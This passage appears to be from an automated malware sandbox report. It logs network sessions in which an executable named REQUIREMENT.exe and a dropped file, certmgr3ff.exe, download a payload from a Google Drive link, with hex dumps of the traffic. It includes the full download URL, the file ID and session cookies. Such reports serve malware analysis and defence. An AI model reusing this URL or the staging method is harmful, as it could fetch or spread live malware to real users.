0b d9 90 c2 f5 a9 38 24 45 7c c6 6d 78 9f a5 3d 11 90 0d 1f 2c ce 20 77 9e e7 9a 06 fe 95 cc cc 3d d8 04 d5 4b 4f dc a2 17 d9 a8 36 bb 48 Data Ascii: <}7{<l>,"!ZQ\_}_o^ze5D%zqq:Oo[v?80hW7-!<_H:(2d5~$vn]\|1EhQ:cz,MP5\lK6p{x8$E\|mx=, w=KO6H
2021-10-13 13:51:48 UTC	327	IN	Data Raw: 9b b1 4f 9a 6b a8 1d 6b f9 27 af a3 a4 4f 2c bd 9c 93 b0 2c 86 86 65 96 21 6c c6 97 db 27 b9 15 9f de a7 73 3c 67 1e 6c 92 7e d6 a4 c3 b6 25 06 fc 75 06 57 84 28 09 98 49 59 c0 56 0d 6b 6a c5 e8 0e 3a bc 74 09 da 33 33 7e 89 38 4d 6c 14 90 39 90 a5 e8 97 c7 8e e0 10 2e a7 f1 ca 3f 4f 6c 57 96 a9 06 c9 c0 eb 56 8b 44 b3 4d 55 8c 93 ec 34 c1 d1 7b b6 8e a7 79 4d 81 ea f0 5c 73 f9 4a bb cf 64 0b 7a d4 6a 9e 77 ea ed 68 6f c7 67 c7 5c 89 83 55 75 77 16 32 00 f6 9f 45 68 18 47 b4 9b 1e 00 75 01 d9 3d 11 09 60 04 3e 74 10 ec d7 2f ac d4 2b 7f 67 0a cb 94 87 0b 61 b8 21 a1 6b 3d a8 38 9e 07 aa 13 a1 3c 4e 70 ca 29 fb c9 c0 ef 2c 8b b5 40 43 e7 ea 89 9b 57 6f 06 43 cf e7 48 95 34 34 2c 67 d3 0d 0c fd 41 be ac d7 d4 99 ae 23 62 6e 10 08 cd 73 d4 f6 de 1a d8 f5 29 Data Ascii: Okk'O,,e!l's<gl~%uW(IYVkj:t33~8Ml9.?OlWVDMU4{yM\sJdzjwhog\Uuw2EhGu=`>t/+ga!k=8<Np),@CWoCH44,gA#bns)
2021-10-13 13:51:48 UTC	328	IN	Data Raw: 1d c3 ed 53 35 84 a3 57 59 ec 6b 4b 9c 1d 8a 2a 6e 1b 60 38 05 65 29 b2 ce 39 c6 f2 cf e2 56 05 9b 42 67 75 7c 2c 07 ef 35 44 a7 1c 0f 8c 8e b7 b6 bc 06 0f 8f 05 11 56 e2 7c ee 32 9b 3c cb 6d 7e df 6d 1e 22 6c 32 d4 a4 84 58 8a a9 cc 41 41 ee ef ed 35 20 fd 2b 52 b4 fc 0e d1 c5 d1 13 31 75 3a 04 3b d9 cb 7a a1 36 e5 91 9a a6 57 06 1f c8 ec 73 77 fe fa 41 c0 d1 e0 a1 31 33 88 50 24 47 75 76 6f f6 4a 1b 33 d7 0e eb 77 c2 30 76 7f 77 22 c0 ba 5f 27 58 91 ea ff 9a fe c5 e9 3f 4b 19 1c 47 4a 36 a9 f8 49 27 0e 15 2e e1 97 9b 5c 02 ae 76 d9 96 dd fa 17 7c 95 d0 e3 27 3b e9 5e 3e 67 22 0c e5 74 6f e1 09 df 84 2a 9a 74 89 50 89 3f 10 46 cd 58 d3 d2 cf 18 60 30 74 3a d2 07 6d c3 69 08 5f 78 ec 24 14 31 93 eb 37 d3 8e 2d 15 8c 8f a9 ec 4b 1c ae eb 03 1f 05 52 db 0e Data Ascii: S5WYkKn`8e)9VBgu\|,5DV\|2<m~m"l2XAA5 +R1u:;z6WswA13P$GuvoJ3w0vw"_'X?KGJ6I'.\v\|';^>g"totP?FX`0t:mi_x$17-KR
2021-10-13 13:51:48 UTC	330	IN	Data Raw: d8 d1 f6 88 cf 15 0a c1 a2 a2 c4 a3 43 d8 0a ef d0 40 21 34 44 2a 3d 1f a8 e8 a9 0c 7d 9c cb 60 ec 00 66 ca b4 1e 10 8e 71 c0 bc 98 c1 36 fb b8 93 bd 57 be af ec ea 76 8a d7 73 a5 a0 78 53 c2 e5 c0 d2 a7 50 43 c2 77 a0 94 d1 dc a0 bd 7a b2 00 24 8e a3 5d b0 c9 1b 76 70 5b 91 97 0b 45 8b 47 49 7a 64 81 c7 65 3c 00 b1 25 bc 2e 10 b9 9a f4 1e 94 98 94 1a 4c ee 03 0e 82 39 57 77 4d 58 5e 72 ba d3 82 81 9b f3 cb 5a a6 28 0d 46 e8 bb 29 42 80 59 6c a9 7e 66 08 1c a6 d2 1e aa 0d 34 81 35 c5 c0 f3 12 9b be 08 db cb b6 56 03 bb f8 6c 60 71 f3 24 eb 30 cd 38 63 1d 1e 84 22 1c 20 36 ed 66 59 64 48 7e 22 3e da 8b aa 8f ab 4c 93 8b 9f 0e b0 2b 13 62 2a 92 37 c8 ff b3 c0 6f b1 3c 06 d9 0f da 1c d4 b9 e5 09 7c 2f b5 ec f3 86 c5 3d 05 fb cb 0a ce 67 96 23 30 4b aa fb 89 Data Ascii: C@!4D=}`fq6WvsxSPCwz$]vp[EGIzde<%.L9WwMX^rZ(F)BYl~f45Vl`q$08c" 6fYdH~">L+b7o<\|/=g#0K
2021-10-13 13:51:48 UTC	331	IN	Data Raw: df a1 64 78 95 45 e4 ee 97 7d c5 1b fe 3d 7e 14 1f c5 63 8f 8c ab c6 e8 19 7d 06 8e 0b d5 32 c2 e6 41 eb 56 7a 02 65 28 c9 8d ae cc cc 9a 57 b2 e5 b3 9b ab de a4 c9 2a fc 85 65 75 44 1a 8a 91 db eb c7 ec 3e 35 9b 3e 69 17 eb 32 78 da 88 f2 7d 41 8d 4f 2c bf 3f d5 64 82 d2 06 bc 85 d5 c5 8f 15 ef d7 c5 da 19 1a 84 9c b5 8e 7b 38 d9 72 87 82 ab cd 89 30 40 e7 4e 07 b8 b3 c5 ba ef 9a 04 1a 4a 9a 96 73 9d 00 d0 d9 0b 46 b8 9e 5c 1b ba 28 51 df d9 64 61 c2 b0 d6 66 8e 2c be a7 fa 6e e0 24 73 0e 1e db 6d b7 bd 48 c9 15 c3 27 7e 02 90 ff f5 39 f3 0d f2 f0 62 f5 89 ef 1f de af 48 08 d3 94 a4 8e 9f cd 6c 2c 0a 6a 27 4a bb 43 21 1c df e3 03 93 e4 dd 57 03 5e c4 fd 71 83 ff a4 17 dd 1e b5 4c 7c 40 a0 be 5b 02 f0 0a 45 54 2d dc 46 14 94 b1 0b 84 dc 82 c6 22 01 a6 4c Data Ascii: dxE}=~c}2AVze(W*euD>5>i2x}AO,?d{8r0@NJsF\(Qdaf,n$smH'~9bHl,j'JC!W^qL\|@[ET-F"L
2021-10-13 13:51:48 UTC	332	IN	Data Raw: a6 c9 14 24 b0 eb ad 69 a0 12 f2 c5 19 fb 4b 14 f7 af 94 69 be 6b 55 52 38 b3 b8 e6 75 a4 74 40 fc d1 d6 b5 be b7 35 b7 ad d3 58 75 a4 3d a6 77 96 c9 99 0b ed d1 50 40 74 b7 0b bf 3c ce f5 68 14 eb a3 89 03 62 9a 58 bc b7 7d 45 8d 90 3a b5 34 5f 0d 42 7a 7e 13 b3 9d 93 0c 26 0d 3f 3b f4 e7 8b a5 cd 97 1a db 1d b9 a2 46 ec fa db 6c 8c 4d 42 4f 0e 00 ac f9 1d ac f5 52 01 48 9e 99 b5 42 3b a5 3e be 8e aa a9 04 91 ee 0d 19 c9 dc d9 2a 6b e3 8f 96 1a ab 51 7d 77 fb 43 3b 51 f0 00 af b1 9a 1f a0 91 e7 4d ed 59 6b 9b f6 8c 5b 6b 21 99 43 9f 1f 61 e3 21 32 28 46 ca 10 e1 9f d1 fb 05 f3 c6 a6 43 9f 63 02 96 e3 0b 30 c8 ac 1b 0c 8a b1 87 a3 72 75 63 fa 5c af c2 a2 29 fc 1c d7 96 1b 7e 23 37 d8 81 eb 20 40 b1 aa eb eb a6 7e c7 f9 a5 d0 de 9f 43 ae 3a b4 53 e3 d5 10 Data Ascii: $iKikUR8ut@5Xu=wP@t<hbX}E:4_Bz~&?;FlMBORHB;>*kQ}wC;QMYk[k!Ca!2(FCc0ruc\)~#7 @~C:S
2021-10-13 13:51:48 UTC	334	IN	Data Raw: 4c 90 ea 47 d6 0e 31 0f ad 25 24 97 6a 81 ff 1c af d1 a7 3e 56 47 42 0e fc 75 a8 e2 cd fa fb 22 58 9d 88 29 9e 79 30 6e 97 0f 6b 0e dc 81 9f cd 2b ef f5 9e 5b e7 15 8b 4b e9 b6 79 5e 12 e3 e1 d4 4e b2 e9 b4 22 cc a7 1e eb 9b a4 81 eb 92 11 c4 bc 17 6a 36 48 da bb a7 28 75 0d dc 54 92 9b 5c b5 fc f8 ae a2 b8 ad 57 a5 85 e9 02 3d 7a e7 48 11 fa 2f dd 31 ed f1 28 d9 63 75 7e 4f 39 3f a3 14 4a cf 24 6f ae c7 99 a9 b9 7e 89 c9 3a 5e e6 be 7b 64 f6 c6 97 88 03 0c dd b1 c8 4d d0 a2 f5 1c bd fb 2d d5 ef 81 f6 3a c3 79 a2 d5 a7 4a 1c a3 09 93 a1 ff 09 99 c7 ca 52 b3 24 77 1f 68 a0 e5 4e 01 9b ca d4 c8 0c f0 09 d8 de 95 5c 42 21 76 c4 c7 1d 19 bc f8 da 22 24 97 ed 22 72 2e 97 67 47 32 a9 c7 eb cb b4 9b c0 12 c6 3b 9e e1 4e 26 ec c7 b4 df ea a2 7a 79 2b c2 aa 47 3f Data Ascii: LG1%$j>VGBu"X)y0nk+[Ky^N"j6H(uT\W=zH/1(cu~O9?J$o~:^{dM-:yJR$whN\B!v"$"r.gG2;N&zy+G?
2021-10-13 13:51:48 UTC	335	IN	Data Raw: 1c a6 c8 ba 06 70 cc 46 8b d4 c2 3f 2b f7 83 2e 61 99 96 25 56 e4 38 7a 72 93 9e ec 5e c3 bc a4 97 c6 f6 e9 29 bb 04 f5 0c 0f 79 29 ef e8 ab 38 d9 a4 42 d5 6d 83 a2 6c 9d bf a9 a5 bf ec c1 5a 28 20 20 29 5f 6b 68 7b e8 86 21 c2 f8 79 ef b2 e6 63 1b f1 82 63 1e 9c 4f d2 df 9e ee 0d ae 1f 58 82 ac 1b 06 cf 24 cc 7d e3 78 a3 ae f7 bf c1 11 31 02 a7 1c 7b 53 95 1d 9c 00 56 17 18 f5 c8 74 06 7d a3 59 62 23 63 cd 80 0b d6 6d 09 b7 ec 70 b6 e6 38 ef 44 4d b5 7f 00 14 fa e2 70 79 f9 8d 05 ad 5f c7 de bf c6 60 25 21 c0 fa 23 04 42 4e df 28 ae 35 b7 42 2a 3c 25 6a 9d 49 54 66 d5 ef ba 47 5a 47 81 b1 c2 f9 76 2b c3 3e 4a 93 25 a6 53 e9 3a 18 4e ba b4 f5 33 a8 24 a2 31 59 56 d6 97 29 fd 9b 2e 6d ce eb b4 f7 55 f2 dc f6 c3 b0 94 d9 1d ba 96 82 35 c7 95 00 af 2b 83 8d Data Ascii: pF?+.a%V8zr^)y)8BmlZ( )_kh{!yccOX$}x1{SVt}Yb#cmp8DMpy_`%!#BN(5B*<%jITfGZGv+>J%S:N3$1YV).mU5+
2021-10-13 13:51:48 UTC	336	IN	Data Raw: 98 45 d1 f5 c7 fd 28 9f 74 3b 4a 01 60 55 c2 2c a8 15 8e 51 77 a6 42 70 85 64 55 79 2a bb 07 27 2f c6 59 70 53 dc 5e de aa 1c 52 61 51 69 bd 81 6e 65 13 15 10 cf 94 80 5a 5f 56 f7 09 70 c1 a1 28 1d 9e fd 59 79 90 c9 54 f7 b4 1d b5 74 36 d5 88 d8 28 82 56 83 60 77 ae f5 9a eb 7a af e7 ed 12 8a 2a 4a 88 14 5d 15 dd fd 6a 85 cc 38 92 a5 a4 a3 46 df 11 ec fd 89 26 4e 73 4c 5e 81 b8 be f2 02 49 dd 1c 04 18 48 41 f6 a1 f8 dd 85 9a 70 e7 ae b8 f2 9b b7 13 30 56 75 42 82 7a 64 7f 1c a1 50 ac cc 0d a0 40 ab ca 1a ec 85 52 ca 68 f8 9d f5 5a 60 e1 36 b6 2f ea f8 27 0c 28 ce b0 8c 4e d9 c0 7d bf bf 67 c6 4d 51 0f d1 64 4e 10 66 19 1a 64 3d eb f3 dd 4d 43 a9 ce 4b 43 34 34 33 ae 33 89 a9 c8 32 b4 8b 24 0b db 1c 34 87 f4 80 ea f0 43 4f b5 fd 20 12 dd ae 32 bf bb 81 fd Data Ascii: E(t;J`U,QwBpdUy'/YpS^RaQineZ_Vp(YyTt6(V`wzJ]j8F&NsL^IHAp0VuBzdP@RhZ`6/'(N}gMQdNfd=MCKC44332$4CO 2
2021-10-13 13:51:48 UTC	337	IN	Data Raw: f1 05 6c 38 48 40 8e bf 30 bd 48 1c f7 a8 80 77 2b 8f 60 77 4e 7b f2 4e 6f f0 58 d4 be af 8f d5 80 9b 39 32 50 bd ae f1 92 1a 36 4a fc da c8 f6 63 72 e8 19 25 ec ed 29 ab f4 d8 ab 29 e7 7e 5f 6e 03 41 b3 1d b3 91 3d 5b 0a f6 72 92 b1 86 c7 2b 09 fd ac 99 3c 22 b3 ea 6f 27 55 8e 6a 74 79 cf b3 83 b5 dc cd 0c 9a 99 5b ef fc 18 2c e5 85 39 a7 8a 16 13 94 57 21 05 6f f1 26 d2 3c b1 c4 b7 14 3c 9b 31 b5 6a a5 a4 68 c1 3c e8 3b c0 bf 80 33 b7 25 11 15 ea b3 66 de 90 2c 5d 8e 92 eb 74 df a5 10 f1 7c 14 2d 6f 77 7e 3e bb 6e 68 22 6f 61 c1 b5 2d ca 81 be 4a e6 05 66 32 a7 30 08 32 be 01 6b aa dd 13 90 fe e2 bb 73 87 46 21 ab 45 12 cf 0e 87 4d b6 dd 29 46 92 d6 56 bf 2e b1 0e b0 85 f7 53 d3 02 1a 73 f8 30 8c d9 77 ad 65 89 11 50 84 78 1c b2 80 84 43 74 84 6c 1e 61 Data Ascii: l8H@0Hw+`wN{NoX92P6Jcr%))~_nA=[r+<"o'Ujty[,9W!o&<<1jh<;3%f,]t\|-ow~>nh"oa-Jf202ksF!EM)FV.Ss0wePxCtla
2021-10-13 13:51:48 UTC	338	IN	Data Raw: 6a bd 63 22 0f 03 4d 0a 38 32 4d fc 81 8a 58 61 2e 0f 83 67 20 b3 86 54 a0 90 35 4c 65 f2 c6 d8 7d 9d 05 fa aa 93 3b d5 84 74 ef 81 14 02 d2 96 7a 36 0b 0e c0 f8 01 65 72 80 ec f1 7c 1c 57 e8 94 b1 f5 85 4f 99 f7 11 a5 1c 4b 00 4b 6c 31 7d 6f 1a 19 9f 59 3d 29 f1 51 07 40 d4 5f b2 3c 6c 9a 0a da 5c 97 4f 98 17 3e fb 33 d7 dc 8c 38 95 e1 8d aa 57 2d 4c 08 8a 8a 85 36 fe 37 cc 21 d6 37 f3 b2 c9 e1 4c f0 f2 ba a3 f4 b9 07 87 88 0d 69 6c 9d 61 3f 16 fe 7c 9f 49 7a 0d 44 75 76 98 4d 72 a8 30 ec 30 36 f4 c7 4b 94 49 b4 9d ae e4 83 48 29 d0 28 a4 ec e7 96 1a bf ee 33 54 c2 8d d3 b0 5b 29 85 9e b0 0d c3 6a 47 1a 8a 01 43 62 8a f4 38 ab 76 31 18 3f 80 fe f3 c6 43 a3 ec e3 e3 23 af 0f 43 a2 14 78 ae fd 41 ca 6d 6c da 7f ca e9 2c 33 f3 73 c4 68 e2 36 a4 03 6d ba e8 Data Ascii: jc"M82MXa.g T5Le};tz6er\|WOKKl1}oY=)Q@_<l\O>38W-L67!7Lila?\|IzDuvMr006KIH)(3T[)jGCb8v1?C#CxAml,3sh6m
2021-10-13 13:51:48 UTC	339	IN	Data Raw: ea d6 82 19 e7 ad 19 7a e4 c0 d0 42 3d 45 e3 cd 04 dd 0f 3b d4 e1 f3 24 6e 15 70 f6 37 c1 fb 5d cc cb 9b 66 73 5f 60 96 93 36 90 86 13 86 c9 84 ad 7b c2 b8 76 f4 ed 4d f8 72 10 fa d7 8d 05 de de c7 90 88 e0 c0 a5 60 a5 b0 44 65 07 86 6c 51 0a 7b b4 09 35 a4 bb b6 89 49 54 fc 87 92 fc 87 7f ac c8 c5 4c 37 66 74 4c 8f 06 8a dc a6 72 b5 e1 e4 c1 a7 01 cd 77 c7 17 32 f5 35 05 e9 0d c5 43 58 4f 7d c8 a4 03 65 f0 08 94 e8 cb 85 76 9f 84 b7 7a 43 87 51 2b 8e 7e 63 ea 22 79 76 01 40 c5 cb a6 7b 2b f8 59 d9 75 a5 d5 7f 5b a3 82 0e 13 a1 1f 4a fd 3f ea 3e 76 2a ba 6e 30 c4 b0 5b f7 32 b4 32 8d ba bc a0 d8 8f fc 06 d2 06 68 53 82 1b 15 8e bc 83 ec a3 2b 9f 99 d3 b0 4a ff 71 e2 76 b2 2d 29 0a 91 9f 95 51 4e 7b d7 48 41 c5 23 0c 1c e9 48 3b ec 4d 6e 26 84 9d 20 47 8b Data Ascii: zB=E;$np7]fs_`6{vMr`DelQ{5ITL7ftLrw25CXO}evzCQ+~c"yv@{+Yu[J?>v*n0[22hS+Jqv-)QN{HA#H;Mn& G
2021-10-13 13:51:48 UTC	341	IN	Data Raw: 9e 70 1e 35 ef e8 7e f5 f3 1c 34 a6 35 5a b4 5d 43 30 a1 50 a6 b9 67 3d 05 d6 91 d1 4d 9b 53 07 ab 9e 69 47 cb df b3 6f 64 e2 99 9b 3c 12 af 86 97 6e cb 56 31 eb c4 fa 4b e7 88 b9 5c 06 fb fc dc de d1 28 59 01 ac 76 2a ee e8 05 d0 a7 d0 3a b3 24 5b 1a 8d 09 43 91 94 1a c9 8e 1b 41 2f f9 7e 2d b7 d7 e3 a5 5d 43 0d a9 d4 37 6f c4 03 73 de 7f 23 34 48 03 73 16 46 c1 88 bc 75 6c 09 70 9e 50 6d 04 91 65 1d ee 81 0f e0 ba 58 f0 42 28 ea e6 2f a4 91 dd 72 a2 ce b3 ad 61 64 8a ec b3 68 c3 9b 76 f0 43 8c fd 8f 6f 6f 87 79 b7 d2 72 78 88 2b 1a cb 81 ea ef 1a 8e 82 61 60 b4 e7 c2 b9 91 88 f7 a5 29 14 2b 01 fd 3f ef e2 e8 13 c1 58 b0 ad 45 ca 4d 90 21 94 10 92 b4 16 c6 6c b1 3d ba f8 c9 6f 80 34 49 22 b5 d3 cf 7e 12 7e 9b ec c4 4e 18 07 03 92 f9 08 d8 61 0f be 1c ec Data Ascii: p5~45Z]C0Pg=MSiGod<nV1K\(Yv*:$[CA/~-]C7os#4HsFulpPmeXB(/radhvCooyrx+a`)+?XEM!l=o4I"~~Na
2021-10-13 13:51:48 UTC	342	IN	Data Raw: 2e 5d 0c 2b d9 87 51 c7 c4 12 63 e0 de a5 f6 11 cb 96 4d 5e cc b9 7c 74 a6 ca 53 29 33 0a de 70 e7 6f 97 38 23 77 6e 21 26 1a f7 ae cb 7d 33 34 8f 62 1d 63 47 1d 6c df d9 ea 09 1c b5 7d 61 bf 5c 82 43 5c 59 a5 eb 49 f6 f1 2a df ff 13 2d c6 68 0b 31 8e 7d 2c 22 c2 07 12 22 5b 13 ea 5d 35 ca 5d 09 ee 08 a0 1e 7b b9 5a dd 05 39 33 ce a5 5b 76 86 9d c5 39 73 c0 c5 e7 42 83 3a ba 36 61 31 ca a5 8f be aa b6 17 65 3c e7 2d fe bc 17 a8 77 43 dc 05 b2 6d 32 5f 50 da 29 d8 78 2c b1 65 e2 e1 05 a1 9a a3 ca af cd 23 86 4e c4 38 54 0d 7f d7 9d 55 55 60 03 eb 43 af e4 d1 5c c5 45 82 a0 af d2 29 45 23 be be 1d 3f ae 81 19 6f d9 32 e2 5e cb ea 27 4b cd f2 cf f0 03 9f 58 03 9a 8a 65 87 bc 39 e0 2c 1c 64 b6 41 a8 95 6b 1f d0 9d f5 ad 97 0e 86 c3 cd d4 b1 f9 62 d3 29 16 fe Data Ascii: .]+QcM^\|tS)3po8#wn!&}34bcGl}a\C\YI*-h1},""[]5]{Z93[v9sB:6a1e<-wCm2_P)x,e#N8TUU`C\E)E#?o2^'KXe9,dAkb)
2021-10-13 13:51:48 UTC	343	IN	Data Raw: f2 4b 1a 52 b3 86 09 89 23 00 5b d8 de 8b 44 1d b1 c5 90 30 a5 45 75 a3 f3 7c a1 63 5c 89 bb 07 92 00 23 c4 62 cf 72 37 b6 89 91 95 3e c8 63 65 b7 93 36 8f ca 50 b7 f4 d0 86 02 ef 66 66 fe f3 e5 4d c2 28 ad 84 3f b2 71 10 ce 24 46 ec bb a4 70 f2 07 a2 c4 98 bc fd c3 bc 57 0c 79 a4 ea 56 99 05 39 dc 81 bf 5c 9a b4 93 95 d6 d0 36 46 61 48 8a cf 1f e4 70 d4 ec b7 f5 1e 91 0d f5 f5 b9 27 a4 0d da b7 f8 86 57 7f f8 8e 61 68 49 17 c9 c4 d2 02 a2 b4 24 0e 55 5d 7a c8 1b c3 65 ab 6b 9d 1b ce 35 d1 fb 86 14 d7 27 bc 7e f9 69 e5 f4 81 52 ca e0 f6 25 78 ce 4b 9e ae e4 b6 e1 b3 f2 6a d3 1b 84 1d 41 ba 07 e3 62 15 f1 f5 9c 54 3b 69 6d c8 0b 2e 34 9f 4b ef 16 32 b6 ba 88 6b 0d 41 28 a2 97 1f 41 07 fd 52 45 77 de 46 19 be 9c 5d 09 50 92 cf 41 84 70 22 9a d2 76 52 bc a7 Data Ascii: KR#[D0Eu\|c\#br7>ce6PffM(?q$FpWyV9\6FaHp'WahI$U]zek5'~iR%xKjAbT;im.4K2kA(AREwF]PAp"vR
2021-10-13 13:51:48 UTC	344	IN	Data Raw: d4 11 57 a8 a6 94 7f fc 40 ca 95 9f 16 ce d3 92 b0 fd 3f 5b bc 5d 3d b5 6c 0e cf 9b db dc f5 d9 d4 1c 29 14 f8 7f 1b 7f 22 04 c8 73 63 a1 5a 93 c3 f8 cf d1 ba c4 65 36 ab e8 eb d0 12 cf 52 c9 6e 53 bb 4b 3f c4 d1 a1 e4 9c 69 36 5a 94 ea 22 d6 2e 10 33 33 17 b1 a3 d8 4c ca 94 e8 af 44 9c 78 6b b3 06 ea 0c 65 2a 8c e6 ca 69 e9 9e 1d 6b 71 61 aa 28 42 db 2f 90 4b 70 45 e3 62 d6 6d 1a 32 b9 5a 0c d1 aa 72 68 b8 4d a3 4b 1c 2b a4 65 30 9a 93 d6 ed c6 e9 07 65 a5 93 5f 6b b6 89 47 70 f9 b5 11 7a 22 4f 27 e8 6d 5e aa b5 e6 b5 3d 7e 2f 29 fb 8f 31 d3 13 05 37 69 38 4d 20 6f 7f 89 e7 38 4b 61 6b 73 e8 77 0a ac dd 2f 9b 92 c2 7d ce fa dd 27 ed 06 7d e8 e7 37 60 96 4a f1 fe 4c ac f3 89 8c da e1 13 64 20 34 e1 6f ad 5f 5c bf 01 63 ac cd 82 49 02 14 44 d6 0d 76 c3 af Data Ascii: W@?[]=l)"scZe6RnSK?i6Z".33LDxke*ikqa(B/KpEbm2ZrhMK+e0e_kGpz"O'm^=~/)17i8M o8Kaksw/}'}7`JLd 4o_\cIDv
2021-10-13 13:51:48 UTC	346	IN	Data Raw: 85 d5 b6 d5 35 ac a2 c8 14 e2 85 51 cd 10 11 63 0e 5b f2 5c 66 43 f1 d9 25 87 23 4b c4 28 11 7f a5 1a 1d 17 b1 ac 3e 9b 2b 66 27 b2 43 72 9a 67 e7 19 af 27 53 99 cb 57 a8 ad 7b 45 b7 2c 18 3f 8c 41 67 3e 38 cf e2 27 53 c4 eb f8 30 33 a2 91 7e 2f 5c 03 c7 b9 f7 98 dc ba 90 1d d9 71 f0 7b 71 6d f2 4b 7f 8e 44 82 f0 bf 66 2d 31 ac 52 5c 11 c5 ed a0 44 29 ce cf 6d fb 36 fe 18 a0 75 ad 72 cc b9 38 31 d5 64 24 2f a4 ed a1 fa 90 b0 cb 07 71 55 a3 44 bc e3 af b7 df 1e f0 8e 67 33 25 0e 70 ad 5b 66 4d 1a 29 ab 64 0c f4 e0 41 10 dd 64 8b 28 47 46 ff a1 e3 a2 1c 6f 4a fb 8e 5b 10 d2 d7 f4 b3 4a 27 71 a1 09 f2 bb f3 aa 3b 48 08 03 2a a8 be 1e c0 7f 34 20 03 06 48 01 3c 79 7f ef a2 f8 c1 Data Ascii: 5Qc[\fC%#K(>+f'Crg'SW{E,?Ag>8'S03~/\q{qmKDf-1R\D)m6ur81d$/qUDg3%p[fM)dAd(GFoJ[J'q;H*4 H<y

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49829	172.217.168.46	443	C:\Users\user\Desktop\REQUIREMENT.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 13:52:00 UTC	346	OUT	GET /uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache Cookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs
2021-10-13 13:52:00 UTC	346	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 13 Oct 2021 13:52:00 GMT Location: https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download Content-Security-Policy: script-src 'nonce-mL+AADJXKmMZdNCw9+t4HA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-10-13 13:52:00 UTC	347	IN	Data Raw: 31 39 38 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6f 2d 36 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 Data Ascii: 198<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0o-60-docs.googleusercontent.com/docs/secure
2021-10-13 13:52:00 UTC	348	IN	Data Raw: 73 63 2f 6f 72 34 38 69 68 73 6b 30 76 6d 69 66 35 69 66 75 6c 33 65 34 38 74 62 63 69 6e 6a 62 76 35 35 2f 70 65 6f 74 69 67 63 6a 75 75 74 31 63 72 36 67 30 38 64 35 31 33 64 36 6f 70 63 73 39 33 67 39 2f 31 36 33 34 31 33 33 30 37 35 30 30 30 2f 31 38 32 38 31 38 39 35 36 31 30 38 37 36 33 39 31 32 30 38 2f 30 34 32 32 35 37 39 36 32 37 32 31 32 36 34 37 34 30 31 33 5a 2f 31 63 61 76 6d 76 66 68 42 6b 52 6b 72 35 38 6b 50 62 50 38 79 6d 4d 50 4a 41 45 4a 5a 47 45 31 33 3f 65 3d 64 6f 77 6e 6c 6f 61 64 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: sc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download">here</A>.</BODY></HTML>
2021-10-13 13:52:00 UTC	348	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49830	172.217.168.33	443	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 13:52:00 UTC	348	OUT	GET /docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0o-60-docs.googleusercontent.com Connection: Keep-Alive Cookie: AUTH_2b3btrhtkn05e9f8mgnbbcclritoc6m9=04225796272126474013Z\|1634133075000\|cco6hf5p2hi2d6l67mrd596u1prmvso4
